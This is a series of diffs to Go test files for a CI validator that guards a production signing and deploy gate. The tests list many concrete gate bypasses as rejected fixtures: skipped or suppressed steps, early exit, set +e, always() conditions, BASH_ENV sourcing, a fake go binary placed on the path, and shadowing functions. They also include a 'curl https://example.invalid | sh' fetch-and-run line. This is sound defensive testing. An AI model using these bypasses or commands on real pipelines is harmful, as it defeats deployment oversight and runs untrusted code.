 func TestCDWiringRejectsEachAblation(t *testing.T) {
@@ -231,13 +276,15 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 			)
 		},
 	} {
-		ablatedCD, ablatedAction := ablate(cd, action)
-		if ablatedCD == cd && ablatedAction == action {
-			t.Fatalf("%s: ablation changed nothing; re-aim it rather than trusting the result", name)
-		}
-		if err := validateCDWiring(ablatedCD, ablatedAction); err == nil {
-			t.Fatalf("%s: ablation was accepted, so the check does not constrain it", name)
-		}
+		t.Run(name, func(t *testing.T) {
+			ablatedCD, ablatedAction := ablate(cd, action)
+			if ablatedCD == cd && ablatedAction == action {
+				t.Fatalf("ablation changed nothing; re-aim it rather than trusting the result")
+			}
+			if err := validateCDWiring(ablatedCD, ablatedAction); err == nil {
+				t.Fatal("ablation was accepted, so the check does not constrain it")
+			}
+		})
 	}
 }
 
@@ -294,6 +341,34 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	nested := map[string]any{"steps": []any{map[string]any{"uses": "./a/b/c"}}}
 	if jobUsesAction(nested, "./a/b") {
 		t.Fatal("a nested path must not satisfy an action check")
+	}
+	// POSITIVE case — without it a jobUsesAction that always returned false
+	// would pass both assertions above. Same argument as the enforcesFailure
+	// positive case; it applies here too and I had not applied it.
+	exact := map[string]any{"steps": []any{map[string]any{"uses": "./a/b"}}}
+	if !jobUsesAction(exact, "./a/b") {
+		t.Fatal("the exact action path must satisfy an action check")
+	}
+
+	// runBlockIsSimpleSequence: keywords match as WORDS, operators as
+	// substrings. Raised by CodeRabbit — `strings.Contains` rejected
+	// `docker buildx …` for containing "do", which is the safe direction with a
+	// message that names a token the step does not use. A guard that refuses
+	// correct work with a false explanation is one people route around.
+	ordinary := map[string]any{"run": "docker buildx imagetools inspect x\ngh run download y\ngo run ./scripts/v a b\n"}
+	if err := runBlockIsSimpleSequence(ordinary, "j"); err != nil {
+		t.Fatalf("ordinary commands containing keyword substrings must be accepted: %v", err)
+	}
+	// ...and the NEGATIVE half, or the relaxation above could have disabled it.
+	for name, run := range map[string]string{
+		"conditional":  "if false; then\ngo run ./x\nfi\n",
+		"early exit":   "exit 0\ngo run ./x\n",
+		"chaining":     "true && go run ./x\n",
+		"substitution": "go run $(echo ./x)\n",
+	} {
+		if err := runBlockIsSimpleSequence(map[string]any{"run": run}, "j"); err == nil {
+			t.Fatalf("%s must still be rejected", name)
+		}
 	}
 }
 

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -191,6 +191,36 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			), a
 		},
+		// Codex P2, round 3: the THIRD shape of "the line is present but does it
+		// run". Whole-line equality closed the quoted case, step metadata closed
+		// the skipped case, and neither says the SHELL reaches it.
+		"validator command sits after an early exit": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go test ./scripts/validate-dr-signing\n",
+				"          exit 0\n          go test ./scripts/validate-dr-signing\n",
+				1,
+			), a
+		},
+		"validator command is wrapped in a false conditional": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go test ./scripts/validate-dr-signing\n",
+				"          if false; then\n          go test ./scripts/validate-dr-signing\n",
+				1,
+			), a
+		},
+		// Codex P2, round 3: the composite action was still SCANNED while
+		// cd.yaml was parsed — a heredoc in a run block carries the exact
+		// `uses:` text while the action invokes nothing of the sort.
+		"publisher uses: text survives only inside a heredoc": func(w, a string) (string, string) {
+			return w, strings.Replace(
+				a,
+				"      uses: ./.github/actions/deploy-prod/publish-platform-manifests",
+				"      run: |\n        cat <<'EOF'\n        uses: ./.github/actions/deploy-prod/publish-platform-manifests\n        EOF",
+				1,
+			)
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -199,8 +199,8 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	if jobRunsCommand(echoed, "go run ./x") {
 		t.Fatal("an echoed command must not count as executed")
 	}
-	real := map[string]any{"steps": []any{map[string]any{"run": "go test ./x\ngo run ./x\n"}}}
-	if !jobRunsCommand(real, "go run ./x") {
+	executed := map[string]any{"steps": []any{map[string]any{"run": "go test ./x\ngo run ./x\n"}}}
+	if !jobRunsCommand(executed, "go run ./x") {
 		t.Fatal("a command on its own run line must count as executed")
 	}
 

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -479,6 +479,54 @@ func TestMergeQueueProductionRoutesUseTheCheckedAction(t *testing.T) {
 	// "tighten" this into rejecting the real workflow.
 }
 
+// TestDependencyStatusOverrideRefusalSeparatesFunctionsFromComparisons pins the
+// distinction the refusal rests on. Refusing every mention of "failure" would
+// also refuse `needs.x.result == 'failure'`, which overrides nothing — and the
+// heal job's own real condition contains exactly that, so getting this wrong
+// breaks the shipped workflow rather than some hypothetical one.
+func TestDependencyStatusOverrideRefusalSeparatesFunctionsFromComparisons(t *testing.T) {
+	t.Parallel()
+
+	gated := mergeQueueProductionJob{name: "deploy-prod"}
+	exempt := mergeQueueProductionJob{name: "heal-prod-on-failure", mayOverrideDependencyStatus: true}
+
+	allowed := map[string]any{
+		"no condition at all":     nil,
+		"a plain event gate":      "github.event_name == 'merge_group'",
+		"a result COMPARISON":     "needs.deploy-prod.result == 'failure'",
+		"a success() assertion":   "success() && github.event_name == 'merge_group'",
+		"an unrelated identifier": "needs.changes.outputs.always == 'true'",
+	}
+	for name, condition := range allowed {
+		job := map[string]any{}
+		if condition != nil {
+			job["if"] = condition
+		}
+		if err := refuseDependencyStatusOverride(job, gated); err != nil {
+			t.Fatalf("%s must be accepted, or the guard refuses correct work: %v", name, err)
+		}
+	}
+
+	refused := map[string]string{
+		"always":              "always() && github.event_name == 'merge_group'",
+		"failure":             "failure() && needs.changes.outputs.k8s == 'true'",
+		"cancelled":           "!cancelled()",
+		"wrapped in ${{ }}":   "${{ always() }}",
+		"spelled with spaces": "always ()",
+		"upper-cased":         "ALWAYS()",
+	}
+	for name, condition := range refused {
+		if err := refuseDependencyStatusOverride(map[string]any{"if": condition}, gated); err == nil {
+			t.Fatalf("%s must be refused on a job that publishes on the success path", name)
+		}
+		// ...and the exemption must still let the heal job through, or the
+		// carve-out is not actually doing anything.
+		if err := refuseDependencyStatusOverride(map[string]any{"if": condition}, exempt); err != nil {
+			t.Fatalf("%s must remain allowed on the unsuccessful-path heal job: %v", name, err)
+		}
+	}
+}
+
 func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	t.Parallel()
 

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -482,7 +482,6 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 		t.Fatalf("a plain node must be accepted: %v", err)
 	}
 
-	// jobUsesAction: equality, so a prefix-sharing sibling is a different action.
 	// usesAction: equality, so a prefix-sharing sibling is a different action.
 	if usesAction("./a/b")(map[string]any{"uses": "./a/b-canary"}) {
 		t.Fatal("a sibling path sharing a prefix must not satisfy an action check")
@@ -490,7 +489,7 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	if usesAction("./a/b")(map[string]any{"uses": "./a/b/c"}) {
 		t.Fatal("a nested path must not satisfy an action check")
 	}
-	// POSITIVE case — without it a jobUsesAction that always returned false
+	// POSITIVE case — without it a usesAction that always returned false
 	// would pass both assertions above. Same argument as the enforcesFailure
 	// positive case; it applies here too and I had not applied it.
 	if !usesAction("./a/b")(map[string]any{"uses": "./a/b"}) {

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -310,6 +310,27 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			)
 		},
+		// CodeRabbit P1: `set +e` runs the validator and DISCARDS its verdict,
+		// then a later succeeding line carries the step to exit 0. The fifth
+		// shape of "does this command count" — quoted, skipped, unreached,
+		// printed, and now ignored.
+		"validator failure is discarded by set +e": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go test ./scripts/validate-dr-signing\n",
+				"          set +e\n          go test ./scripts/validate-dr-signing\n",
+				1,
+			), a
+		},
+		// ...and the same question one key over.
+		"validator step overrides the shell": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🖋️ Validate DR signing contract\n",
+				"      - name: 🖋️ Validate DR signing contract\n        shell: bash {0}\n",
+				1,
+			), a
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -107,6 +107,7 @@ func repoTreeCopy(t *testing.T, mutate map[string]func(string) string) string {
 	for _, rel := range []string{
 		".github/workflows/dr-rebuild.yaml",
 		".github/workflows/cd.yaml",
+		".github/workflows/ci.yaml",
 		".github/actions/deploy-prod/action.yml",
 		".github/actions/deploy-prod/publish-platform-manifests/action.yml",
 		"ksail.prod.yaml",
@@ -266,6 +267,27 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			)
 		},
+		// Codex P2, round 4: a here-doc contains the validator line verbatim
+		// while the step only PRINTS it. Redirection joins the operator set.
+		"validator command is inside a here-doc": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go test ./scripts/validate-dr-signing\n",
+				"          cat <<'EOF'\n          go test ./scripts/validate-dr-signing\n",
+				1,
+			), a
+		},
+		// Codex P2, round 4: the DEPLOY step — the same skip/suppression
+		// question already asked of the validator step, at the cell I had not
+		// swept. A skipped deploy step still names the shared action.
+		"deploy step is skipped by a step condition": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🚀 Deploy to Production\n        # The deploy logic",
+				"      - name: 🚀 Deploy to Production\n        if: false\n        # The deploy logic",
+				1,
+			), a
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.
@@ -286,6 +308,56 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 			}
 		})
 	}
+}
+
+func TestMergeQueueProductionRoutesUseTheCheckedAction(t *testing.T) {
+	t.Parallel()
+
+	ci := repoFile(t, ".github/workflows/ci.yaml")
+	if err := validateProductionRoutes(ci); err != nil {
+		t.Fatalf("shipped ci.yaml can reach production outside the checked action: %v", err)
+	}
+
+	// 🔴 The premise of this contract is that the guarantee is only as strong as
+	// its weakest ROUTE, and until this round it checked one of the two. Codex
+	// reproduced the gap: replacing only the merge-queue job's shared-action
+	// call passed every check here while the direct-push route stayed gated.
+	for name, ablate := range map[string]func(string) string{
+		"merge-queue deploy uses a different action": func(s string) string {
+			return strings.Replace(s, "        uses: ./.github/actions/deploy-prod\n", "        uses: ./.github/actions/other\n", 1)
+		},
+		"merge-queue heal uses a different action": func(s string) string {
+			// The SECOND occurrence is the healing job; replace it by cutting at
+			// the first and rejoining, so the arm cannot silently hit the wrong one.
+			first := strings.Index(s, "        uses: ./.github/actions/deploy-prod\n")
+			if first < 0 {
+				t.Fatal("fixture no longer contains the shared-action call")
+			}
+			cut := first + len("        uses: ./.github/actions/deploy-prod\n")
+			return s[:cut] + strings.Replace(s[cut:], "        uses: ./.github/actions/deploy-prod\n", "        uses: ./.github/actions/other\n", 1)
+		},
+		"merge-queue deploy step is skipped": func(s string) string {
+			return strings.Replace(s, "        uses: ./.github/actions/deploy-prod\n", "        if: false\n        uses: ./.github/actions/deploy-prod\n", 1)
+		},
+		"merge-queue deploy step suppresses failure": func(s string) string {
+			return strings.Replace(s, "        uses: ./.github/actions/deploy-prod\n", "        continue-on-error: true\n        uses: ./.github/actions/deploy-prod\n", 1)
+		},
+	} {
+		t.Run(name, func(t *testing.T) {
+			ablated := ablate(ci)
+			if ablated == ci {
+				t.Fatal("ablation changed nothing; re-aim it rather than trusting the result")
+			}
+			if err := validateProductionRoutes(ablated); err == nil {
+				t.Fatal("ablation was accepted, so the check does not constrain it")
+			}
+		})
+	}
+
+	// The job-level condition rule must NOT apply here: ci.yaml gates its deploy
+	// on `merge_group`, which is legitimate and necessary. Asserting the shipped
+	// file passes (above) is what pins that — but state it, or a later round may
+	// "tighten" this into rejecting the real workflow.
 }
 
 func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
@@ -335,19 +407,26 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 
 	// jobUsesAction: equality, so a prefix-sharing sibling is a different action.
 	sibling := map[string]any{"steps": []any{map[string]any{"uses": "./a/b-canary"}}}
-	if jobUsesAction(sibling, "./a/b") {
+	if _, ok := jobStepUsingAction(sibling, "./a/b"); ok {
 		t.Fatal("a sibling path sharing a prefix must not satisfy an action check")
 	}
 	nested := map[string]any{"steps": []any{map[string]any{"uses": "./a/b/c"}}}
-	if jobUsesAction(nested, "./a/b") {
+	if _, ok := jobStepUsingAction(nested, "./a/b"); ok {
 		t.Fatal("a nested path must not satisfy an action check")
 	}
 	// POSITIVE case — without it a jobUsesAction that always returned false
 	// would pass both assertions above. Same argument as the enforcesFailure
 	// positive case; it applies here too and I had not applied it.
-	exact := map[string]any{"steps": []any{map[string]any{"uses": "./a/b"}}}
-	if !jobUsesAction(exact, "./a/b") {
+	exact := map[string]any{"steps": []any{map[string]any{"uses": "./a/b", "id": "wanted"}}}
+	found, ok := jobStepUsingAction(exact, "./a/b")
+	if !ok {
 		t.Fatal("the exact action path must satisfy an action check")
+	}
+	// It must return the MATCHED step, not merely report one exists — the
+	// caller applies enforcesFailure to it, so the wrong step would silently
+	// check the wrong metadata.
+	if found["id"] != "wanted" {
+		t.Fatalf("returned the wrong step: %v", found)
 	}
 
 	// runBlockIsSimpleSequence: keywords match as WORDS, operators as

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -393,6 +393,67 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			), a
 		},
+		// Codex P2: `BASH_ENV` names a file bash sources before running the
+		// script, and the runner's default `bash -e {0}` is non-interactive, so
+		// the sourced file is in force for the gate's own commands. A `go()`
+		// function defined there shadows the executable exactly as the sixth
+		// round's inline shadow did — except the allowlist never sees it,
+		// because the run block still contains only the two permitted lines.
+		// Each scope is its own arm for the reason the shell arms give: they are
+		// separate keys in separate maps.
+		"step-level env sources a go shadow into the gate's shell": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🖋️ Validate DR signing contract\n",
+				"      - name: 🖋️ Validate DR signing contract\n        env:\n          BASH_ENV: .ci/shadow-go.sh\n",
+				1,
+			), a
+		},
+		"job-level env sources a go shadow into the gate's shell": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n    runs-on: ubuntu-latest\n",
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n    runs-on: ubuntu-latest\n    env:\n      BASH_ENV: .ci/shadow-go.sh\n",
+				1,
+			), a
+		},
+		"workflow-level env sources a go shadow into the gate's shell": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"\njobs:\n",
+				"\nenv:\n  BASH_ENV: .ci/shadow-go.sh\n\njobs:\n",
+				1,
+			), a
+		},
+		// The same environment, reached without an `env:` key anywhere. A step
+		// earlier in the gate job writes to the runner's own `$GITHUB_ENV` /
+		// `$GITHUB_PATH` bridges, which apply to every LATER step — so the
+		// validator step's shell starts shadowed while the validator step itself
+		// is byte-for-byte unchanged and passes every existing check.
+		"an earlier gate step exports BASH_ENV through the runner bridge": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🖋️ Validate DR signing contract\n",
+				"      - name: 😈 Stage a go shadow\n        run: |\n"+
+					"          printf 'go() { true; }\\n' > /tmp/shadow-go.sh\n"+
+					"          echo \"BASH_ENV=/tmp/shadow-go.sh\" >> \"$GITHUB_ENV\"\n\n"+
+					"      - name: 🖋️ Validate DR signing contract\n",
+				1,
+			), a
+		},
+		"an earlier gate step prepends a fake go through the runner bridge": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🖋️ Validate DR signing contract\n",
+				"      - name: 😈 Stage a fake go\n        run: |\n"+
+					"          mkdir -p /tmp/bin\n"+
+					"          printf '#!/bin/sh\\nexit 0\\n' > /tmp/bin/go\n"+
+					"          chmod +x /tmp/bin/go\n"+
+					"          echo /tmp/bin >> \"$GITHUB_PATH\"\n\n"+
+					"      - name: 🖋️ Validate DR signing contract\n",
+				1,
+			), a
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.
@@ -663,6 +724,61 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 	} {
 		if err := refuseShellOverride(scoped[0], scoped[1], scoped[2], "j"); err == nil {
 			t.Fatalf("a shell override at %s must be refused", name)
+		}
+	}
+
+	// envAllowsOnly: same per-scope structure, plus the property an allowlist
+	// can quietly lose. The POSITIVE control comes first deliberately — a
+	// helper that refused every env would satisfy each negative case below
+	// while making a legitimate gate unshippable, so "rejects the payload" and
+	// "still accepts what is permitted" are two different claims and both are
+	// asserted.
+	if err := envAllowsOnly(
+		map[string]any{"env": map[string]any{"GOFLAGS": "-mod=readonly"}},
+		map[string]any{"env": map[string]any{"GOFLAGS": "-mod=readonly"}},
+		map[string]any{"env": map[string]any{"GOFLAGS": "-mod=readonly"}},
+		"j", []string{"GOFLAGS"},
+	); err != nil {
+		t.Fatalf("an allow-listed variable must be accepted at every scope: %v", err)
+	}
+	if err := envAllowsOnly(map[string]any{}, map[string]any{}, map[string]any{}, "j", nil); err != nil {
+		t.Fatalf("a gate that sets no env at all must be accepted: %v", err)
+	}
+	for name, scoped := range map[string][3]map[string]any{
+		"workflow scope": {{"env": map[string]any{"BASH_ENV": "s.sh"}}, nil, {}},
+		"job scope":      {nil, {"env": map[string]any{"BASH_ENV": "s.sh"}}, {}},
+		"step scope":     {nil, nil, {"env": map[string]any{"BASH_ENV": "s.sh"}}},
+		// A shape the helper cannot parse still reaches the shell, so reading
+		// it as absent would accept exactly the payload this refuses.
+		"unreadable shape": {nil, nil, {"env": "BASH_ENV=s.sh"}},
+	} {
+		if err := envAllowsOnly(scoped[0], scoped[1], scoped[2], "j", nil); err == nil {
+			t.Fatalf("an env override at %s must be refused", name)
+		}
+	}
+
+	// gateJobRunsOnlyItsValidator: the validator step itself is the ONE run
+	// step, so the positive control has to include it — a helper that refused
+	// every run step would pass every negative case and refuse the real gate.
+	validatorStep := map[string]any{"run": "go run ./x\n"}
+	if err := gateJobRunsOnlyItsValidator(
+		map[string]any{"steps": []any{
+			map[string]any{"uses": "actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0"},
+			map[string]any{"uses": "actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16"},
+			validatorStep,
+		}}, "j", gateStepActions,
+	); err != nil {
+		t.Fatalf("the real gate job's step list must be accepted: %v", err)
+	}
+	for name, steps := range map[string][]any{
+		"a second run step": {validatorStep, map[string]any{"run": "echo BASH_ENV=s.sh >> \"$GITHUB_ENV\"\n"}},
+		"an unlisted action": {
+			map[string]any{"uses": "some/action@v1"}, validatorStep,
+		},
+		"a step this check cannot read": {"- run: true", validatorStep},
+	} {
+		if err := gateJobRunsOnlyItsValidator(map[string]any{"steps": steps}, "j", gateStepActions); err == nil {
+			t.Fatalf("%s must be refused", name)
 		}
 	}
 }

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -436,7 +436,12 @@ func TestMergeQueueProductionRoutesUseTheCheckedAction(t *testing.T) {
 			// the first and rejoining, so the arm cannot silently hit the wrong one.
 			first := strings.Index(s, "        uses: ./.github/actions/deploy-prod\n")
 			if first < 0 {
-				t.Fatal("fixture no longer contains the shared-action call")
+				// Return the input unchanged rather than calling t.Fatal on the OUTER T from
+				// inside the subtest closure: that runs runtime.Goexit on the subtest goroutine
+				// while marking the parent failed, and `testing` then reports a confusing
+				// "test executed panic(nil) or runtime.Goexit" instead of the real reason. The
+				// caller already refuses an ablation that changed nothing, against the subtest.
+				return s
 			}
 			cut := first + len("        uses: ./.github/actions/deploy-prod\n")
 			return s[:cut] + strings.Replace(s[cut:], "        uses: ./.github/actions/deploy-prod\n", "        uses: ./.github/actions/other\n", 1)

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -238,6 +238,32 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			), a
 		},
+		// CodeRabbit P1 and Codex P2, round 9, reported INDEPENDENTLY against
+		// this same head — the SIXTH shape of "the line is present but does it
+		// run", and the one that finally says the denylist was the wrong
+		// mechanism. `go()` `{` `}` carry no rejected keyword and no rejected
+		// operator, so the block is accepted; bash resolves the FUNCTION before
+		// the executable, so both required lines run and neither validator does.
+		"gate SHADOWS go with a shell function so neither validator executes": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go test ./scripts/validate-dr-signing\n",
+				"          go()\n          {\n            true\n          }\n          go test ./scripts/validate-dr-signing\n",
+				1,
+			), a
+		},
+		// The same bypass in its non-invoking spelling: the required lines are
+		// hidden INSIDE a function body that is never called, and a succeeding
+		// command follows. Kept as a separate arm because it defeats a fix that
+		// only refuses a function whose name collides with a required command.
+		"gate BURIES both validators in an uninvoked function body": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"          go test ./scripts/validate-dr-signing\n",
+				"          validator_noop()\n          {\n          go test ./scripts/validate-dr-signing\n",
+				1,
+			), a
+		},
 		// Codex P2, round 3: the THIRD shape of "the line is present but does it
 		// run". Whole-line equality closed the quoted case, step metadata closed
 		// the skipped case, and neither says the SHELL reaches it.
@@ -421,6 +447,20 @@ func TestMergeQueueProductionRoutesUseTheCheckedAction(t *testing.T) {
 		"merge-queue deploy step suppresses failure": func(s string) string {
 			return strings.Replace(s, "        uses: ./.github/actions/deploy-prod\n", "        continue-on-error: true\n        uses: ./.github/actions/deploy-prod\n", 1)
 		},
+		// Codex P2, round 9. The direct-push route refuses ANY job-level
+		// condition on deploy-prod; this route deliberately permits one, because
+		// `merge_group` gating is legitimate — and that carve-out was total.
+		// `always()` makes the deploy eligible after `changes` FAILS, and the
+		// signing validator runs inside `changes`, so the publishing job runs
+		// behind a gate that already failed while this check reports success.
+		"merge-queue deploy overrides a failed dependency with always()": func(s string) string {
+			return strings.Replace(
+				s,
+				"    if: github.event_name == 'merge_group' && needs.changes.outputs.k8s == 'true'",
+				"    if: always() && github.event_name == 'merge_group' && needs.changes.outputs.k8s == 'true'",
+				1,
+			)
+		},
 	} {
 		t.Run(name, func(t *testing.T) {
 			ablated := ablate(ci)
@@ -522,23 +562,31 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 		}
 	}
 
-	// runBlockIsSimpleSequence: keywords match as WORDS, operators as
-	// substrings. Raised by CodeRabbit — `strings.Contains` rejected
-	// `docker buildx …` for containing "do", which is the safe direction with a
-	// message that names a token the step does not use. A guard that refuses
-	// correct work with a false explanation is one people route around.
-	ordinary := map[string]any{"run": "docker buildx imagetools inspect x\ngh run download y\ngo run ./scripts/v a b\n"}
-	if err := runBlockIsSimpleSequence(nil, nil, ordinary, "j"); err != nil {
-		t.Fatalf("ordinary commands containing keyword substrings must be accepted: %v", err)
+	// runBlockRunsOnlyAllowedCommands: an ALLOWLIST, so the positive case is
+	// the allowed lines themselves plus the two things that are not commands.
+	// The earlier denylist's word-boundary regression (`docker buildx …`
+	// rejected for containing the keyword `do`) is not pinned here any more
+	// because it is no longer expressible: nothing is matched by substring, so
+	// there is no token for a legitimate command to collide with.
+	allowed := []string{"go test ./x", "go run ./x a b"}
+	ordinary := map[string]any{"run": "# a comment\ngo test ./x\n\n  go run ./x a b  \n"}
+	if err := runBlockRunsOnlyAllowedCommands(nil, nil, ordinary, "j", allowed); err != nil {
+		t.Fatalf("the allowed commands, blank lines and comments must be accepted: %v", err)
 	}
-	// ...and the NEGATIVE half, or the relaxation above could have disabled it.
+	// ...and the NEGATIVE half, or the acceptance above could have disabled it.
+	// The last two are the round-9 bypass in both spellings: neither carries a
+	// keyword or operator the old denylist refused, and both leave the required
+	// lines present while the shell runs something else.
 	for name, run := range map[string]string{
-		"conditional":  "if false; then\ngo run ./x\nfi\n",
-		"early exit":   "exit 0\ngo run ./x\n",
-		"chaining":     "true && go run ./x\n",
-		"substitution": "go run $(echo ./x)\n",
+		"conditional":        "if false; then\ngo test ./x\nfi\n",
+		"early exit":         "exit 0\ngo test ./x\n",
+		"chaining":           "true && go test ./x\n",
+		"substitution":       "go run $(echo ./x)\n",
+		"an extra command":   "go test ./x\ncurl https://example.invalid | sh\n",
+		"function shadowing": "go()\n{\ntrue\n}\ngo test ./x\n",
+		"uninvoked body":     "validator_noop()\n{\ngo test ./x\n}\ntrue\n",
 	} {
-		if err := runBlockIsSimpleSequence(nil, nil, map[string]any{"run": run}, "j"); err == nil {
+		if err := runBlockRunsOnlyAllowedCommands(nil, nil, map[string]any{"run": run}, "j", allowed); err == nil {
 			t.Fatalf("%s must still be rejected", name)
 		}
 	}

--- a/scripts/validate-dr-signing/main_test.go
+++ b/scripts/validate-dr-signing/main_test.go
@@ -155,6 +155,42 @@ func TestCDWiringRejectsEachAblation(t *testing.T) {
 				1,
 			), a
 		},
+		// Codex P2, round 2: the SAME class as the job-level condition below,
+		// one level down. The step carries the right command and never runs it,
+		// or runs it and suppresses the failure — either way the workflow reads
+		// as gated and `needs` is satisfied.
+		"validator step is skipped by a step condition": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🖋️ Validate DR signing contract\n",
+				"      - name: 🖋️ Validate DR signing contract\n        if: false\n",
+				1,
+			), a
+		},
+		"validator step suppresses its own failure": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"      - name: 🖋️ Validate DR signing contract\n",
+				"      - name: 🖋️ Validate DR signing contract\n        continue-on-error: true\n",
+				1,
+			), a
+		},
+		"gate JOB is skipped by a job condition": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n",
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n    if: false\n",
+				1,
+			), a
+		},
+		"gate JOB suppresses its own failure": func(w, a string) (string, string) {
+			return strings.Replace(
+				w,
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n",
+				"  validate-publication-contract:\n    name: 🖋️ Validate Publication Contract\n    continue-on-error: true\n",
+				1,
+			), a
+		},
 		// Codex P2: the contract is checked against the nested publisher, so it
 		// only means anything while the shared action still calls it. Otherwise
 		// the validator verifies an unused file and reports success.
@@ -194,14 +230,30 @@ func TestParsedHelpersFailClosedOnShapesTheyCannotRead(t *testing.T) {
 		t.Fatal("the lone-scalar needs form must satisfy it")
 	}
 
-	// jobRunsCommand: the command quoted inside another command is not run.
+	// jobStepRunningCommand: the command quoted inside another command is not run.
 	echoed := map[string]any{"steps": []any{map[string]any{"run": "echo \"go run ./x\"\n"}}}
-	if jobRunsCommand(echoed, "go run ./x") {
+	if _, ok := jobStepRunningCommand(echoed, "go run ./x"); ok {
 		t.Fatal("an echoed command must not count as executed")
 	}
 	executed := map[string]any{"steps": []any{map[string]any{"run": "go test ./x\ngo run ./x\n"}}}
-	if !jobRunsCommand(executed, "go run ./x") {
+	if _, ok := jobStepRunningCommand(executed, "go run ./x"); !ok {
 		t.Fatal("a command on its own run line must count as executed")
+	}
+
+	// enforcesFailure: both suppression shapes are refused, and the plain node
+	// is accepted — the second half matters, or the check could be refusing
+	// everything and still look correct.
+	if enforcesFailure(map[string]any{"if": "false"}, "x") == nil {
+		t.Fatal("a condition must be refused")
+	}
+	if enforcesFailure(map[string]any{"continue-on-error": true}, "x") == nil {
+		t.Fatal("continue-on-error: true must be refused")
+	}
+	if err := enforcesFailure(map[string]any{"continue-on-error": false}, "x"); err != nil {
+		t.Fatalf("an explicit continue-on-error: false is not suppression: %v", err)
+	}
+	if err := enforcesFailure(map[string]any{"run": "go test ./x"}, "x"); err != nil {
+		t.Fatalf("a plain node must be accepted: %v", err)
 	}
 
 	// jobUsesAction: equality, so a prefix-sharing sibling is a different action.

--- a/scripts/validate-eks-ci-role-policy/main_test.go
+++ b/scripts/validate-eks-ci-role-policy/main_test.go
@@ -1193,12 +1193,35 @@ func TestManualDeployIsGatedByTheValidator(t *testing.T) {
 		"validate-eks-authorization:",
 		"go test ./scripts/validate-eks-ci-role-policy",
 		"go run ./scripts/validate-eks-ci-role-policy .",
-		"needs: [validate-eks-authorization]",
 	} {
 		if !strings.Contains(contract, required) {
 			t.Errorf("CD workflow is missing %q — the manual deploy path bypasses the "+
 				"EKS authorization gate that the merge-queue path cannot skip", required)
 		}
+	}
+
+	// The dependency is PARSED, not grepped — the same reason the sibling
+	// assertion on ci.yaml parses it. A literal `needs: [validate-eks-authorization]`
+	// proves a RENDERING rather than the property: it passes on the same text
+	// sitting in a comment, and it FAILS the moment a second legitimate gate
+	// joins the list. That combination is the worst of both — it obstructs
+	// correct work while still not proving what it claims. Membership is
+	// stronger and stable under a growing gate list.
+	documents, err := decodeDocuments(workflow)
+	if err != nil || len(documents) != 1 {
+		t.Fatalf("decode CD workflow: documents=%d error=%v", len(documents), err)
+	}
+	jobs, err := nestedMap(documents[0], "jobs")
